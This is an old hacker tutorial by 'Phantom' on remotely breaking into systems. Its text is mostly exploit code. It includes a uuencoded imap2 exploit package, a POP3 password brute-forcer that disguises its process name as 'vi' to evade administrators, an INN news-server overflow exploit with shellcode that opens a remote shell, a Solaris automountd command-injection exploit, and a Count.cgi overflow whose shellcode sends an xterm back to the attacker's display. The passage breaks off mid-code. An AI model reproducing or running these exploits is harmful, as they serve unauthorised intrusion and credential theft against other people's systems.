How to get in... (remote) ------------------------------------- by Phantom Well, folks, once you've gotten the name of the site, it's fairly hard (:)) to get inside, especially if it has a firewall && stuph.. But, if you get enough info on that site, maybe, just maybe, you might get in.. So, you might think of programs you could use to get a root shell or maybe a passwd/shadow file... :) well, you should definately look for open ports, like imapd/httpd/sendmail/nntp/pop3 && stuff... Well, in this file, you wont find any exploits, due to complains about how we provide stuff to remotely break in somebody's system. So, if you have an user there, it's your responsability, but if we provide you with such tools, it seems people think it's our responsability... so, DONT READ ANY FURTHER!!!!!!!!!!!!!!!!!!!!!!!!!!! :) But anyway, if you really need some of those programs, here are a couple of them... Here is an uuencoded package to exploit imap2: begin 644 imap.tgz M'XL("-%Q=C0"`VEM87!S+G1A<@#L/&M7VTBR^6J=D__0X^P$"V0C^048G`U) M8,(=0N8$LO,(')^VU+)[D"6/'H`GR?WMMZJZ)Y]O_0CZ3]I[\-]RO-X=AVM]V^<_\[=K.+^]]IMMMM MIXG[[W1:L/_V:O^_^N>1#-T@\P2KZH?-)'(OQR*8-MPJVUQG/PL^MM@1RQ+A ML70L6!;*&X:=1,I\_EO^&,AAS.,9=EW?-`JP>\DLV4SE1#3&3Q"<&V6!Q\;\ M2C`O"@63*9O,$A'X%AMF*3M:F["`_SYKL%WS$W!F4Y$`H')UZLEHL0H0A-K% M.M\-TP"KC$>>\"5,_.SMX>'IT2\'S&EN;1N&.P8N6!^)=""2:>TJDI[)WAO( MGCR9U*J3Z"I@WT*3]:W@-U5SU_BHA@PS_UT.ZF(WAX/R5)-ARB+?3T1JXLJ3 MD(]&1$.9,#^.)D1-?YAX;"KB@$57(O:#Z!J7K6;&#P*1NT8EG\P7\;NFW=Z& MN?(NU"1NA)O`M@7O+EB_:*J>WXCA^4VS=7[3$>_6@:55SMM>-[6SSL*A&N?WPSAVQJJ:=H:/(YQ.?1M+H#JP)`. M8F4K#!T`)^#KP=?W\^_F4(:;R1@@.>7O`B2[N?1M+7YW8'*[O?3=PM\J;%<. MR(_BFNS;&\ZNW,NWL][>E1O]MFG,SZGUFMK?=?,Q;KP$6K.<9TQ6U]M=@CL1 M$ZBH06?+OMFQK:WN]H9C[I;;W>FL1M"H[<(J=M)*TC@08:VH,,T2Y#+CU9V+ MO@U,`ER&/'7%@TP`+E2HMH!@P$:*VZ(`.$R&(Q!7%+X$&A(Y"J4O70Z-XRA*0)$%UL>`>BWW7<;:Z#1R0(Y1,8V!6OZ:8U**)V?'K M[XY.V'GUV^2\RJ8\2<[#*DJZ;^ZR8F0LTBP.-7>C9!G(]3A1$)(4)>ZE[^'B M"YGSWSEVLXT"1WTG7*J>/!ZY%M.;!(4KDV2)@(">VM7/;A2&PDU!&OO,R2LE M%&R+_8IUS>T.H!F@ZDLB&H8Z;)#23XQEV)S,A?*$K:?#0,/VO0%L-Z'N)Z5> M-`RVA7ZC+,VGA*(,^[;E99,ASH[U)7;##_;T:[@NML>:2BGYFM2@YD2,I#X/ MWR9\)'J,#G*V-XZ2]`E[I]CQXCP$JA/3B1N9U@Y^.CH;'.X?';]]#T[,W M!_NO+$9P'`5'^JRFAO99W3$55G4E%GIEU1QCP*M&&P'SD!*GD18[''QW<'9X M;#';-#4<6F"0"()?ZGLX.%5="#-Z]KCQ5[:"T`M8!> MS;8^64WH%"U,FNJ$.L)CN9K&3M\?'^F^-..OO5&`]]ECC9IJF M@O1^KE``*$`[.EW$QISSX_L29X)0P(9H$;5+"BW?W4N3L%RB*TJNV>_CII>9 MR9Z/_VA4RH@LK-\T*N^-RO+LV`40J,RG_N0$E3)J)56%0S]2ZYT?0R&&WX_& M'*]T"`@SR+GT^LZN4D-N+NN@RD?I..=I5>HCG!I!L!`9"[6::>XY9L%D MT!ED/(SZ_8,?7[\]?O'L&,2*??C`\MK][_:/3DRM1(N]($'0BK7NY%).FE-- M?=%?.[?72`OKH:J>3)L'J\]?Y*/\OPB,@_BK10'^*?_?<=#_`]MAY?_?]_ZC M,IJ(>_?_F6-OD?_?[FQM=9PV5#3A>>7_W\?GH?$/'LLH2QCQ`)QFL9RF4!JF M8%.3NXKF?S:=1HGP@AEX[>1))'PBT)4-1XV'QL/5@?%GD']\'B;>_WH<\'/Q M/Z=IZ_A?IP5_0?Y;*^ZWB?JNXW_^7N-\\%H9Z!:C! M`?N87=F-5OW9Z0LVG+&3Z(K_Q/9"^'GZ\BQZWG"CR9-YO.]+(H>?BQVN(H>K MR.$JYID MPRP>2MX(16J<9L-?00'WV+/HM*>XY%B&V0V=KF"%BDF4@KF;@37$AS*`\0WC MC4A$F-85G9V8^1&'ZQQ@9QDMI&<89^G`3 M/H/>J,B#8,8B<&O!7$ZT'TLN;K@&REV($+U<$"RPR4/V+!N=Q?RW1J-A&&HQ MI[,D!3>!Q5D8HFF.AKI:8")B<`J9QV&A(0.S3\V'JX89Q,,ZN M`1VRU:$;3U,.7GE,8T9@'#-D6\9=5R0)2W7HCN9%ZQ&.F7`$4QM833W15+^. M8H_Y4L#"8,10(&Y@`(67Z./S"0LC#`BJ5>'`@Y_VGY\9GDBY#!+E?@"5QE$` M#,)#6$T$X\#I!Z)2ZA3WJK@ M6XK.*!0X/^&/S!@$K%R51.`!%!.Q%M#]3\)N!)-<@P0(?D/^(7VIH%VG.=P&Y1+4A6;GGX4Z2 M9XS;V>O9/;O14(03P)(CD!&"[@.,39&ZFR0F'JN1``D4$ZI.QMP#!@=C,13" M`XM?(ZRPQ#H40K2F8'=$X+-)Y$E_AK"5HZW$`FTJX"#8G!E%V!$^N.\B=GF" M^`!%A$&H3S-@O43S!NTYRK^>=1I'PP"6J^@.JX%N0'RB#>T$^H,R3E*U=-@' MM2R]#(LIT<#98/HHR774@J)HX.YB]"Z)8HP"*F94TJZD04Z(0$#E?'M!-5[B M7N`^T/@ZV[^'M]TU@(2<;X.F0Q M3'E']!*J5?QTL1Z.&D`VW93A9Z.=/)[R3>Q\"X(WI("G"H;H1>KX54X%<_0Z'-!BY]G.G'QP3HPBEU5S")C4?`S:-1"/1 M2.@']%?]R;C\6+@L\UB<#*U/CFTCGMK308(/PC3B\&22PV-@S)@-*313BA\K M55.KN@$<,M6E`,71J_T?V('6?ZB1E7;+(Q?SCN?I?@:4BWM?("#+HQ?%I+?, MO:H[X/\',33%!71L>'=L/7B@'CY3E&>!AXH:C%BV[9WF11%PZV\7C6A%@8(M MHM>]1"^??>0 M[ORY9<^'N,V%(:YN:G?GH6\_GPW:[`[V*X:X.[I)Q[7S0+SK0;VM(^>MQ2%V M"5J[%+O7P?BFCMW[\R'%#*Y^AN[.<#Y+@7AK81:[^ZDNNLW)V_00R2<BO*@PK(ZGFE?Y)&O<@B3]%G>OZ\#GS2; M"B7*/<=NM>N)_%U$?DV3PJ1(Z.8Z6Z[?<,P\3D\O+38V+OKX,J($4)'57.RS M7J/:C0VUT-+8[=8N3B2&4P6XU.2W=I4E([7T;M=\KZ\.[=K^X>#HY.#,*@>J;=/ M#GU$OYRGX)V@TZ'<.4G>KDPM982"A4>.-X8CR.#\Y&?CT]4H'6CN!S*SGX-M_XN(HX9!\64G>@K^B0XBX$F+_<9I.NUM;EY?7S?0%?@=7]/\ M*VBP*IK:RH8._+H,_4!BH!I\5/`>P`6/0IY&<:-1-?[5^%\\<1K#;'2/^1_M M=J>E\C^URO^ZE\])A/&RGZ.,W%/XDX+!2#8IN(\@XIC_4<1T M5'(8)7QMKC\TV#I#2]93YBLX(ZD(&[=#C&I"\IM.5IW]B3Z&:!EPG(DLZ90O<" MPNE4N)('[.SE_LGWIZ`">FQH^V/K`YH6EA#3V)Y8D^CFQCJ,V]>>]3WZM@A< MQ242BD:<13_-0O;--]\48#,ZS?&Q\C=6H^B$OX/-#RBG`04\ M/&';RWV;2WVQI^[K=)<[MQ8ZJZZZ,ZP$.G]4I"R&L&7:U1UV0&A__I#GNRO['/"Q?!N+KS/&Y^Q^LI?__0Z?;[G1L MO/^SY:SRO^_E`S9HSZBX+JN_;K)ZI),`]?\#667S_$7R?[[6S:\OD_^.79)_ M_%\PCM-NME?R?R_W/QXM)M6H9.SYI81'CPS#>'.P_^+50:5248D$4K@4$TC& M,C5>Z:.C4L%#)%%WPA(F>#*SV*]`78;O/]D:MJX98S%K)&.`Y`9PZ++G15)S M[5H&`0NB$9M&^+)1DG,,=D'E*@LHSR=0;P%58(_T$_0V#:VJH"-W4W"I%Y(7 MC-O_U*9"[^(QP#$4\64@9N6++/*!(,$?SSJ/UW^\U5_G3G^N?__U4'Y M[]K=U?W?^]__.=??H_YOMK>*___5W&I1_+>[U5WI__OX;*Y3>)+RLU"-XYN3 M:1Q=24]XI.\P_DN!UOP.8%TIO;K/?VLP=I32B&P82)<@>1$ZVRJ[2F=*NA$< M&0`M%B*8J>0D]8HFC+!M%LO1F#*89*I:"5`$U3($A4XI9=<\P6#R/Z3+7F&, M.O`%N(C2?3J,LS1+&FF0C2BO025I^LX7Q_QC. M9'RYM?G?L#>D3G#D)B)`N5(^$-=G`WQO^O+@^(?!RT%Q,7.ALASCEB/@@L_F M0T%5((?+=?]V1A;=E?C\/=.[$K<".9%I*UAW)7'1-A*<1OA'6>5F8$"PQ MUU(G0\11&IF[QE+"U3H,HM>^.KZE>`?Z(4"\KEBZ:97?C(-:I(;%LD$RA@D9 MSFI1FLYZ(#'O2\0:PO)EK274Z%X;@5(-L)I%#.A*#UU;R4N^EW?&-[\4?AF@ MX9:%:7F,>C^\,`@33;YD**PZ^<1T0+B[Q]"MH[MF@Y'X6ON1`/7@&W_:\]^] MO_._Z;3L^?G?;;75^;^*_ZS._]7Y_V<[_V_]LXEQ%:\(L#,X6X`P^C!A*E.; M-K*H4V<+UNG+B9S.*A9F$_#)&T1IE=2^`$;Q6:HPMBBI.Y8JNYMCVK\G7-"! MP1P,TD@5C.*..MZ_0/Y+!;`EL(>6#202''-$8ES@%Q[<++^:CATQF8E>.=%- MS[PFS\C"BT!X%./#/!D2C))IE%!V%=#ND'+X,64`&(BNZ6-6,:85J$L)"H5$ M)=AA225DXY-.R"ZPS`T+?>$5^W[3IRO`*D>0"-XG(/4GR2#'EJZ,OJ?74A%= M>7B$];M=%H=D^7_NV%^C161.PKI@JU:A9:L'"&-CTK`(VC%!7<-1"WV M(['K\R@$T4F!?Q)72I:*&[HKD!MB:O>`E^CR-'#.G(O499="K!D)%?+G4*L' M8J0O,^Q4HOERCCX\*`X"I>&`Z'#==U&Y[GZ?_RD)12 M"X%"\^3"N76GV:7<\1MU05\EQFH*/D[R3/&/.L_UUM6`99C4*6?!16BU92*9 M:O%YHO\`S=?_:>_J6^,VFOC?->0[;%0WW)'SQ6Z:%IRZ$.)0`FW2.@VEA&+D MT]I1ZZ"6VH?GNG=_,[(NDN[/30@M%R_,TMK2:W9WWG=T9=V@(,(Z&8O)< MZH?XNI7D6(D/'%1-98+;6XG1(_%_5P4%@5LZYX8UX!*12Y2/$/T+8Q"&R0I; MA=28`MJYO`884O>-I*Q-U1IKVA^-?-YP[DTNEB3*I+ODK)[*7$CRTY*O($)_ M^?'8-,Q(*=0LA/82(L[)@-!?G&*$]+9B`0!AD1.YR^@LFR`'7?1KUJ,,>PD8 MB@2:^4MDK%V^MKR!AG-')_5 M-,+YG-4[[6=@H$])NDZ1P+3B7"-)C4I+XC8B5B6)?Y562*D.=[1(@=\9'<;5 M*$C[RZ_'WY_0;Z-?GOZ$1Z^/?W*A8-4\X*!#&0J*!0EK/Z#J>'$*QQ*$X@?$5D_$_=!4B75$+&5DO&4WGO]G>'/CTOE2Q!S*R@7SZD9)?&;W&_O MXA)>33M+H$V^?6_<>E_B7KT:.7>[7MXDKC9'-UDD@+%EVU7S/$'SZ9.;/<$: MOQ6KNC<15.#Y@>-QF/VKEZH9E@K9G_HS$[E#\WMJ%MT@K: MZ#S_8&,W(>3IWM3(%U"]NC!I4Q<0D1D??Y;V#Y9&5@T,J5-2:`WCF'5"+!FQ M:Q82"O[X2CQ1&ZK MZY!A(,MH@8DUF>[DGDH)"%<@P@^/%<*A$[M:K4@.\[/Y#4(H/F=K[A_]3X*\ MS:MG]YZ=2Z-KT=V)_\0*$H7UFR*$O^*"@Y?^+-WE!&G*IM4T>P-I.XUB-XE-" M.N29&?W8WS&Y_5QP9"<< M5+F6TAG<::J>VM\_$6&6\EOPF803/"XX>),:.;Z:"/8T/N6$U86//,U[(0/= M:COW<1*(_O@&'U'MXUK#&`=+7*C++SBI9ZO$NS>M[YD^X^U?-UGTM?2*HPB= MVH5)!_N'Q@=X5!PP`9]4;_HUS=2M<\&5UH&5)OARCW;XX?;3<#LRYU%NGLJ_ MY.*.?%QKLY.+?Q#;\X$B+=78]6F#,QNE:#[U":!@VB\XG,)C?Y%A]9-0/H'Y M!M/:[R=\03Y<6D^E\$JW'T+E]*LQ6/'XVG;9F>9]74PSBT*=K2KJSCZ M463\)93695X1NA:Z:^>#E6S%>T$XL5H@I0PVU#O/MUG=I_K*/4EH3;RMXGD[ M/,_?6'8WK#*L-;Q>//VM*7X:*I@\XR%*6 MH!*##=$ZWC8B$.W^_?=FV@B[N%'7U`;[@AF^)U3#NN'8WYP6B/`6R_M6O8M#1*L^PO#!T^% MUP$BV,S\.S$-G$Q&V[H@E\)*>2TZ_UH=0!ZS+14W7JYB%$?^R&E;(XOX2"HC MNDO]CR&/YY_=_Y*TC/\J_^>;1U^YO__T]=<'G/_W\)NA_N^_D_]SUY?;NK/S M.?W/2&;.V8.9S\WA`!F*7IPU%^@!B<19YMFU.4DO[-[#_8?\[9T=4A%O3++[ M^OEQ`CV:["?F]\?0&DO.PK6SMX5)8#K=1HB/-$E39(797?`5@+N)=+TB9;)_ M9^<\]U`/$M)Y20P1\/0?DV2TU9X8RZ>7J7'Y100;RS"C+Q\]FNK_QTGT;3S. MT;X.MG?.7R'#*`SW6;GP3^4#T7IOS&YN]N@'`HW>&<&5*3$"21<>FMV#Z6Z> M((,Y0#"Z+NBQ@G"QMT(%$8R]]UX^^/.BM/QP+.AL85.&"(!]3A2]E-7LCD;Y M_8/Q^,X._N3.\$>ZAC:TH0UM:$,;VM"&-K2A#6UH0QO:T(8VM*$-;6A#&]K0 5AC:TH0UM:$/[O[:_`&NPZ$L`H``` ` end Now, here's a pop3 hacker...: /* : After recently installing POP3d on a machine, I played around with it a : bit and came to a few conclusions: : 1) It allows for multiple username/password guesses : 2) There is no logging option for basd user/pass guesses. : This seems like something just begging to be brute force hacked. : Any comments? */ #include #include #include #include #include #include #include #include #include /* First, define the POP-3 port - almost always 110 */ #define POP3_PORT 110 /* What we want our program to be masked as, so nosy sysadmins dont kill us */ #define MASKAS "vi" /* Repeat connect or not - remember, logs still report a connection, so you might want to set this to 0. If set to 0, it will hack until it finds 1 user/password then exit. If set to 1, it will reconnect and try more user/passwords (until it runs out of usernames) */ #define RECONNECT 0 /* The function prototypes */ void nuke_string(char *); int pop_connect(char *); int pop_guess(char *, char *); char *getanswer(char *); char *getanswer_(char *); void swallow_welcome(void); void hackity_hack(void); int popfd; FILE *popfp; FILE *userfile; FILE *dictfile; char host[255]; char dict[255]; char user[255]; main(int argc, char **argv) { if(argc < 4) { /* invalid syntax, display syntax and exit */ printf("Syntax: %s host userfile dictfile\n", argv[0]); exit(0); } /* Validate that the host exists */ if(pop_connect(argv[1]) == -1) { /* Error */ printf("Error connecting to host %s\n", argv[1]); exit(0); } printf("Connected to: %s\n\n", argv[1]); /* Check for the existance of the user file */ userfile=fopen(argv[2], "rt"); if(userfile==NULL) { /* Error */ printf("Error opening userfile %s\n", argv[2]); exit(0); } fclose(userfile); /* Checking for the existance of dict file */ dictfile=fopen(argv[3], "rt"); if(dictfile==NULL) { /* Error */ printf("Error opening dictfile %s\n", argv[3]); exit(0); } fclose(dictfile); /* Copy important arguments to variables */ strcpy(host, argv[1]); strcpy(user, argv[2]); strcpy(dict, argv[3]); nuke_string(argv[0]); nuke_string(argv[1]); nuke_string(argv[2]); nuke_string(argv[3]); strcpy(argv[0], MASKAS); swallow_welcome(); hackity_hack(); } void nuke_string(char *targetstring) { char *mystring=targetstring; while(*targetstring != '\0') { *targetstring=' '; targetstring++; } *mystring='\0'; } int pop_connect(char *pophost) { int popsocket; struct sockaddr_in sin; struct hostent *hp; hp=gethostbyname(pophost); if(hp==NULL) return -1; bzero((char *)&sin,sizeof(sin)); bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); sin.sin_family=hp->h_addrtype; sin.sin_port=htons(POP3_PORT); popsocket=socket(AF_INET, SOCK_STREAM, 0); if(popsocket==-1) return -1; if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1; popfd=popsocket; return popsocket; } int pop_guess(char *username, char *password) { char buff[512]; sprintf(buff, "USER %s\n", username); send(popfd, buff, strlen(buff), 0); getanswer(buff); sprintf(buff, "PASS %s\n", password); send(popfd, buff, strlen(buff), 0); getanswer(buff); if(strstr(buff, "+OK") != NULL) { printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password); return 0; } else return -1; } char *getanswer(char *buff) { for(;;) { getanswer_(buff); if(strstr(buff, "+OK") != NULL) return buff; if(strstr(buff, "-ERR") != NULL) return buff; } } char *getanswer_(char *buff) { int ch; char *in=buff; for(;;) { ch=getc(popfp); if(ch == '\r'); if(ch == '\n') { *in='\0'; return buff; } else { *in=(char)ch; in++; } } } void swallow_welcome(void) { char b[100]; popfp=fdopen(popfd, "rt"); getanswer(b); } void hackity_hack(void) { char *un; char *pw; char *c; int found=0; un=(char *)malloc(512); pw=(char *)malloc(512); if(un==NULL || pw==NULL) return; userfile=fopen(user, "rt"); dictfile=fopen(dict, "rt"); if(userfile == NULL || dictfile == NULL) return; for(;;) { while(fgets(un, 50, userfile) != NULL) { found=0; c=strchr(un, 10); if(c != NULL) *c=0; c=strchr(un, 13); if(c != NULL) *c=0; while(fgets(pw, 50, dictfile) != NULL && found==0) { c=strchr(pw, 10); if(c != NULL) *c=0; c=strchr(pw, 13); if(c != NULL) *c=0; if(strlen(pw) > 2 && strlen(un) > 2) if(pop_guess(un, pw)==0) { found=1; fclose(popfp); close(popfd); if(RECONNECT==0) { free(pw); free(un); fclose(userfile); fclose(dictfile); exit(0); } pop_connect(host); swallow_welcome(); } } fclose(dictfile); dictfile=fopen(dict, "rt"); } fclose(dictfile); fclose(userfile); free(un); free(pw); exit(0); } } Anyways, you will probably need one of these thinggies: INN exploit... ----------------------------- innbuf.c -------------------------------- /* * This just generates the x86 shellcode and puts it in a file that nnrp * can send. The offset and/or esp may need changing. To compile * on most systems: cc innbuf.c -o innbuf. Usage: innbuf [offset] > file. * (C) 1997 by Method * P.S. Feel free to port this to other OS's. */ #include #include #include #include #define DEFAULT_OFFSET 792 #define BUFFER_SIZE 796 #define ADDRS 80 u_long get_esp() { return(0xefbf95e4); } int main(int argc, char **argv) { char *buff = NULL; u_long *addr_ptr = NULL; char *ptr = NULL; int ofs = DEFAULT_OFFSET; int noplen; u_long addr; int i; u_char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x 0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x 52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x0 1" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; if(argc > 1) ofs = atoi(argv[1]); addr = get_esp() - ofs; if(!(buff = malloc(4096))) { fprintf(stderr, "can't allocate memory\n"); exit(1); } ptr = buff; noplen = BUFFER_SIZE - strlen(execshell) - ADDRS; memset(ptr, 0x90, noplen); ptr += noplen; for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (unsigned long *)ptr; for(i = 0; i < ADDRS / 4; i++) *addr_ptr++ = addr; ptr = (char *)addr_ptr; *ptr = '\0'; printf( "Path: dev.null!nntp\n" "From: devNull @%s\n" "Newsgroups: alt.test\n" "Subject: 4 out of 5 Dweebs prefer INND for getting r00t\n" "Message-ID: <830201540.9220@dev.null.com>\n" "Date: 9 Jun 1997 15:15:15 GMT\n" "Lines: 1\n" "\n" "this line left not left intentionally blank\n" ".\n", buff); } --------------------------------------------------------------------------- ---------------------------- nnrp.c -------------------------------------- /* * Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate. * To compile: cc nnrp.c -o nnrp. Usage: nnrp . * (C) 1997 by Method of Dweebs */ #include #include #include #include #include #include #include #include #include #include #include #include #define POST "POST\n" #define SAY(a, b) write(a, b, strlen(b)) #define CHOMP(a, b) read(a, b, sizeof(b)) #define basename(a) bname(a) char *me; make_addr(char *name, struct in_addr *addr) { struct hostent *hp; if(inet_aton(name, addr) == 0) { if(!(hp = gethostbyname(name))) { fprintf(stderr, "%s: ", me); herror(name); exit(1); } addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr; } } char *bname(char *str) { char *cp; if((cp = (char *)strrchr(str, '/')) != NULL) return(++cp); else return(str); } void my_err(char *errstr, int err) { fprintf(stderr, "%s: ", me); perror(errstr); exit(err); } void usage() { printf( "INN version 1.[45].x exploit by Method \n" "Usage: %s \n" "Will start a shell on the remote host.\n" "The second argument is the file containing the overflow data.\ n", me); exit(1); } select_loop(int netfd) { int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO; char buf[512]; fd_set rfds; for( ; ; ) { FD_ZERO(&rfds); FD_SET(in, &rfds); FD_SET(netfd, &rfds); if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL)) < 0) my_err("select", 1); if(!ret) continue; if(FD_ISSET(in, &rfds)) { if((n = read(in, buf, sizeof(buf))) > 0) write(netfd, buf, n); } if(FD_ISSET(netfd, &rfds)) { if((n = read(netfd, buf, sizeof(buf))) > 0) write(out, buf, n); else break; } } } int news_sock(char *host) { struct sockaddr_in sin; int sock; sin.sin_port = htons(119); sin.sin_family = AF_INET; make_addr(host, &(sin.sin_addr)); if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) my_err("socket", 1); if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) my_err("connect", 1); return(sock); } void send_egg(int sk, char *file) { char buf[BUFSIZ]; int dfd; int n; if((dfd = open(file, O_RDONLY)) < 0) my_err("open", 1); printf("Executing innd exploit.. be patient.\n"); n = CHOMP(sk, buf); buf[n] = '\0'; printf(buf); SAY(sk, POST); n = CHOMP(sk, buf); buf[n] = '\0'; printf(buf); sleep(2); printf("Sending overflow data.\n"); while((n = CHOMP(dfd, buf)) > 0) write(sk, buf, n); sleep(2); } void main(int argc, char **argv) { char *victim, *filename; int s; me = basename(argv[0]); if(argc != 3) usage(); filename = argv[2]; send_egg(s = news_sock(victim = argv[1]), filename); select_loop(s); fprintf(stderr, "Connection closed.\n"); printf("Remember: Security is futile. Dweebs WILL own you.\n"); exit(0); } --------------------------------------------------------------------------- hehehehhahaha... kewl, huh ? And there is automountd, for SunOs 5.5.1... :) /* this is really dumb automountd exploit, tested on solaris 2.5.1 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on, map is executed via popen with key given as argument, read automount(1M) patch 10465[45] fixes this */ #include #include #include #include #include #include #define AUTOTS "datagram_v" /* XXX */ void usage(char *s) { printf("Usage: %s mountpoint map key [opts]\n", s); exit(0); } bool_t xdr_mntrequest(xdrs, objp) register XDR *xdrs; mntrequest *objp; { register long *buf; if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE); if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE); return (TRUE); } bool_t xdr_mntres(xdrs, objp) register XDR *xdrs; mntres *objp; { register long *buf; if (!xdr_int(xdrs, &objp->status)) return (FALSE); return (TRUE); } main(int argc, char *argv[]) { char hostname[MAXHOSTNAMELEN]; CLIENT *cl; enum clnt_stat stat; struct timeval tm; struct mntrequest req; struct mntres result; if (argc < 4) usage(argv[0]); req.path=argv[1]; req.map=argv[2]; req.name=argv[3]; req.opts=argv[4]; if (gethostname(hostname, sizeof(hostname)) == -1) { perror("gethostname"); exit(0); } if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) { clnt_pcreateerror("clnt_create"); exit(0); } tm.tv_sec=5; tm.tv_usec=0; stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres, (char *)&result, tm); if (stat != RPC_SUCCESS) clnt_perror(cl, "mount call"); else printf("mntres = %d.\n", result.status); clnt_destroy(cl); } Now, this here is very very dangerous, it exploits the Count.Cgi, on the web servers.. :) /* Count.cgi (wwwcount) linux test exploit (c) 05/1997 by plaguez - dube0866@eurobretagne.fr Contact me if you manage to improve this crap. This program needs drastic changes to be useable. If you can't understand how to modify it for your own purpose, please do not consider trying it. */ #include #include char shell[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d" "\x5e\x18\x88\x46\x2c\x88\x46\x30" "\x88\x46\x39\x88\x46\x4b\x8d\x56" "\x20\x89\x16\x8d\x56\x2d\x89\x56" "\x04\x8d\x56\x31\x89\x56\x08\x8d" "\x56\x3a\x89\x56\x0c\x8d\x56\x10" "\x89\x46\x10\xb0\x0b\xcd\x80\x31" "\xdb\x89\xd8\x40\xcd\x80\xe8\xbf" "\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff" "/usr/X11R6/bin/xterm0-ut0-display0" "127.000.000.001:00" "\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff"; /* Assembly stuff for the previous buffer. This basically implements an execve syscall, by creating an array of char* (needs to put a null byte at the end of all strings). Here we gonna exec an xterm and send it to our host. (you can't simply exec a shell due to the cgi proto). jmp 60 popl %esi xorl %eax,%eax # efface eax movl %esi,%ecx # recupere l'adresse du buffer leal 0x18(%esi),%ebx # recupere l'adresse des chaines movb %al,0x2c(%esi) # cree les chaines azt movb %al,0x30(%esi) # movb %al,0x39(%esi) movb %al,0x4b(%esi) leal 0x20(%esi),%edx # cree le char** movl %edx,(%esi) leal 0x2d(%esi),%edx movl %edx,0x4(%esi) leal 0x31(%esi),%edx movl %edx,0x8(%esi) leal 0x3a(%esi),%edx movl %edx,0xc(%esi) leal 0x10(%esi),%edx movl %eax,0x10(%esi) movb $0xb,%al int $0x80 # passe en mode kernel xorl %ebx,%ebx # termine proprement (exit()) movl %ebx,%eax # si jamais le execve() foire. inc %eax # int $0x80 # call -65 # retourne au popl en empilant l'adresse d e la chaine .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff .ascii \"/usr/X11R6/bin/xterm0\" # 44 .ascii \"-ut0\" # 48 .ascii \"-display0\" # 57 au ; .ascii \"127.000.000.001:00\" # 75 (total des chaines) .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff ... */ char qs[7000]; char chaine[]="user=a"; unsigned long getesp() { // asm("movl %esp,%eax"); return 0xbfffee38; } void main(int argc, char **argv) { int compt; long stack; stack=getesp(); if(argc>1) stack+=atoi(argv[1]); for(compt=0;compt<4104;compt+=4) { 